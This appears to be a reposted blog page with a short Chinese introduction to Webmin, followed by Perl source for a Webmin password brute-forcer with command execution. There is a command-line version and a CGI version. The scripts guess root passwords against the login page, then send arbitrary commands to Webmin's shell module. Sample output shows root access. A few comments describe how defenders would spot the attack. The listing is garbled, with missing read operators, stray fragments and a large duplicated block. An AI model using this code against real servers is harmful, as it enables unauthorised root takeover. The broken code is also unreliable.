Webmin 暴力破解+ 執行命令(轉)
Webmin 暴力破解+ 執行命令(轉)[@more@]Webmin是一個廣泛使用的,執行在linux/unix下,用瀏覽器來管理系統的工具。用它,你不必知道複雜的命令列,也不用瞭解各種複雜的配置檔案,系統管理變得非常簡單!可以設定帳號,配置DNS和檔案共享等. Webmin BruteForce + Command execution v1.5 #!/usr/bin/perl ################################################################################ # Webmin BruteForce + Command execution # v1.0:By Di42lo - "> # v1.5:By ZzagorR - - ################################################################################ #add script: #1.wordlist func. #2.log (line:41) ################################################################################ # usage: # ./webmin1.pl #./webmin1.pl 192.168.0.5 "uptime" wordlist.txt # [+] BruteForcing... # [+] trying to enter with: admim # [+] trying to enter with: admin # [+] Found SID : f3231ff32849fa0c8c98487ba8c09dbb # [+] Password : admin # [+] Connecting to host once again # [+] Connected.. Sending Buffer # [+] Buffer sent...running command uptime # root logged into Webmin 1.170 on linux (SuSE Linux 9.1) # 10:55pm up 23 days 9:03, 1 user, load average: 0.20, 0.05, 0.01 ################################################################################ use IO::Socket; if (@ARGV<3){ print "Webmin BruteForcer v1.5
"; print "usage:
"; print " webmin15.pl
"; print "example:
"; print " webmin15.pl "id" wordlist.txt
"; exit; } my $host=$ARGV[0]; my $cmd=$ARGV[1]; my $wlist=$ARGV[2]; open (data, "$wlist"); @wordlist=; close data; $passx=@wordlist; open(results , ">$host.log"); print results "#############################
"; print results "Webmin BruteForce + Command execution v1.5
"; print results "Host:$host
"; print results "#############################
"; my $chk=0; my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10); if(!$sock){ print "[-] Webmin on this host does not exist
"; print results "[-] Webmin on this host does not exist
"; exit; }else{ $sock->close; print "[+] BruteForcing...
"; } my $sid; $n=0; while ($chk!=1) { $n++; if($n>$passx){ exit; } $pass=@wordlist[$passx-$n]; my $pass_line="page=%2F&user=root&pass=$pass"; my $buffer="POST /session_login.cgi HTTP/1.0
". "Host: $host:10000
". "Keep-Alive: 300
". "Connection: keep-alive
". "Referer:
". "Cookie: testing=1
". "Content-Type: application/x-www-form-urlencoded
". "Content-Length: __
". "
". $pass_line."
"; my $line_size=length($pass_line); $buffer=~s/__/$line_size/g; my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10); if ($sock){ print "[+] trying to enter with: $pass
"; print $sock $buffer; while ($answer=){ if ($answer=~/sid=(.*);/g){ $chk=1; $sid=$1; print "[+] Found SID : $sid
"; print "[+] Password : $pass
"; print results "[+]:Password:$pass
Sid:$sid
"; } } } $sock->close; print results "[-]$pass
"; } print "[+] Connecting to host once again
"; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10); if(!$sock){ print "[-] Cant Connect once again for command execution
"; print results "[-] Cant Connect once again for command execution
"; } print "[+] Connected.. Sending Buffer
"; my $temp="-----------------------------19777347561180971495777867604
". "Content-Disposition: form-data; name="cmd"
". "
". "$cmd
". "-----------------------------19777347561180971495777867604
". "Content-Disposition: form-data; name="pwd"
". "
". "/root
". "-----------------------------19777347561180971495777867604
". "Content-Disposition: form-data; name="history"
". "
". "
". "-----------------------------19777347561180971495777867604
". "Content-Disposition: form-data; name="previous"
". "
". "$cmd
". "-----------------------------19777347561180971495777867604
". "Content-Disposition: form-data; name="pcmd"
". "
". "$cmd
". "-----------------------------19777347561180971495777867604--
"; my $buffer_size=length($temp); $buffer="POST /shell/index.cgi HTTP/1.1
". "Host: $host:10000
". "Keep-Alive: 300
". "Connection: keep-alive
". "Referer:
". "Cookie: sid=$sid; testing=1; x
". "Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604
". "Content-Length: siz
". "
". $temp; $buffer=~s/siz/$buffer_size/g; print $sock $buffer; if ($sock){ print "[+] Buffer sent...running command $cmd
"; print $sock $buffer; while ($answer=){ if ($answer=~/defaultStatus="(.*)";/g) { print $1."
";} if ($answer=~/
/g){
exit;
} else {
print $answer;
print results "[+]$answer
";
}
}
}
}
#!/usr/bin/perl
# CGI front end for the Webmin password-guessing and command-execution script.
# It takes its settings from request parameters, tries each word-list entry as
# the password for user "root" against /session_login.cgi on TCP port 10000,
# and once a response contains "sid=" it posts $cmd to /shell/index.cgi with
# that session cookie.
# NOTE(review): the listing is extraction-damaged further down (the word-list
# and socket read operators and the HTML inside the qq~ blocks are missing),
# so it does not parse as shown.
# Defender view: on the Webmin side this appears as a run of POSTs to
# /session_login.cgi with user=root, then a POST to /shell/index.cgi.
# Failed-login blocking and limiting which addresses can reach port 10000 are
# the controls to check -- confirm what the installed Webmin version offers.
# No "use strict" / "use warnings": every variable below is a package global.
use CGI qw(:standard);
use IO::Socket;
# CGI.pm switch: emit the HTTP header only once even if header() is called again.
$CGI::HEADERS_ONCE = 1;
# Indirect-object constructor call; same as CGI->new.
$CGI = new CGI;
# All four values below come unvalidated from the HTTP request.
# atak : mode switch; "webmin" starts the run, "" presumably prints the input
# form (its HTML is stripped in this copy).
$atak = $CGI->param("atak");
# host : address the script connects to on port 10000.
$host = $CGI->param("host");
# wlist: path of the word list on the server running this CGI. It is passed to
# two-argument open(), which parses the mode out of the string itself, so the
# request controls more than a file name -- a risk for whoever hosts this CGI.
$wlist = $CGI->param("wlist");
# cmd  : text placed in the "cmd", "previous" and "pcmd" form fields; it is also
# echoed into the text/html response without escaping.
$cmd = $CGI->param("cmd");
# windows-1254 is the Turkish Windows code page, matching the Turkish status
# strings printed later in the script.
print $CGI->header(-type=>'text/html',-charset=>'windows-1254');
print qq~
Webmin Web Brute Force v1.5 - cgi versiyon
Webmin BruteForce + Command execution- cgi version
v1.0:By Di42lo - Ablo_2@012.net.il
v1.5:By ZzagorR - -
~; if($atak eq "webmin") { open (data, "$wlist"); @wordlist=; close data; $passx=@wordlist; $chk=0; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25) || die "[-] Webmin on this host does not exist "; $sock->close; print "[+] BruteForcing...
"; $sid; $n=0; while ($chk!=1) { $n++; if($n>$passx){ exit; } $pass=@wordlist[$passx-$n]; $pass_line="page=%2F&user=root&pass=$pass"; $buffer="POST /session_login.cgi HTTP/1.0 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: ". "Cookie: testing=1 ". "Content-Type: application/x-www-form-urlencoded ". "Content-Length: __ ". " ". $pass_line." "; $line_size=length($pass_line); $buffer=~s/__/$line_size/g; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25); if ($sock){ print "[+] Denenen sifre: $pass
"; print $sock $buffer; while ($answer=){ if ($answer=~/sid=(.*);/g){ $chk=1; $sid=$1; print "[+] Found SID : $sid
"; print "[+] Sifre : $pass
"; } } } $sock->close; } print "[+] Connecting to host once again
"; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10) || die "[-] Cant Connect once again for command execution "; print "[+] Connected.. Sending Buffer
"; $temp="-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="cmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pwd" ". " ". "/root ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="history" ". " ". " ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="previous" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pcmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604-- "; $buffer_size=length($temp); $buffer="POST /shell/index.cgi HTTP/1.1 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: ". "Cookie: sid=$sid; testing=1; x ". "Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604 ". "Content-Length: siz ". " ". $temp; $buffer=~s/siz/$buffer_size/g; print $sock $buffer; if ($sock){ print "[+] Buffer sent...running command $cmd
"; print $sock $buffer; while ($answer=){ if ($answer=~/defaultStatus="(.*)";/g) { print $1."
";} if ($answer=~/ /g){
exit;
} else {
print $answer;
}
}
}
}
}
if($atak eq ""){
print qq~
>/g){ $cmd_chk=1; } if ($cmd_chk==1) { if ($answer=~/
Webmin BruteForce + Command execution- cgi version
v1.0:By Di42lo - Ablo_2@012.net.il
v1.5:By ZzagorR - -
~; if($atak eq "webmin") { open (data, "$wlist"); @wordlist=; close data; $passx=@wordlist; $chk=0; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25) || die "[-] Webmin on this host does not exist "; $sock->close; print "[+] BruteForcing...
"; $sid; $n=0; while ($chk!=1) { $n++; if($n>$passx){ exit; } $pass=@wordlist[$passx-$n]; $pass_line="page=%2F&user=root&pass=$pass"; $buffer="POST /session_login.cgi HTTP/1.0 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: ". "Cookie: testing=1 ". "Content-Type: application/x-www-form-urlencoded ". "Content-Length: __ ". " ". $pass_line." "; $line_size=length($pass_line); $buffer=~s/__/$line_size/g; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25); if ($sock){ print "[+] Denenen sifre: $pass
"; print $sock $buffer; while ($answer=){ if ($answer=~/sid=(.*);/g){ $chk=1; $sid=$1; print "[+] Found SID : $sid
"; print "[+] Sifre : $pass
"; } } } $sock->close; } print "[+] Connecting to host once again
"; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10) || die "[-] Cant Connect once again for command execution "; print "[+] Connected.. Sending Buffer
"; $temp="-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="cmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pwd" ". " ". "/root ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="history" ". " ". " ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="previous" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pcmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604-- "; $buffer_size=length($temp); $buffer="POST /shell/index.cgi HTTP/1.1 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: ". "Cookie: sid=$sid; testing=1; x ". "Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604 ". "Content-Length: siz ". " ". $temp; $buffer=~s/siz/$buffer_size/g; print $sock $buffer; if ($sock){ print "[+] Buffer sent...running command $cmd
"; print $sock $buffer; while ($answer=){ if ($answer=~/defaultStatus="(.*)";/g) { print $1."
";} if ($answer=~/
>/g){ $cmd_chk=1; } if ($cmd_chk==1) { if ($answer=~/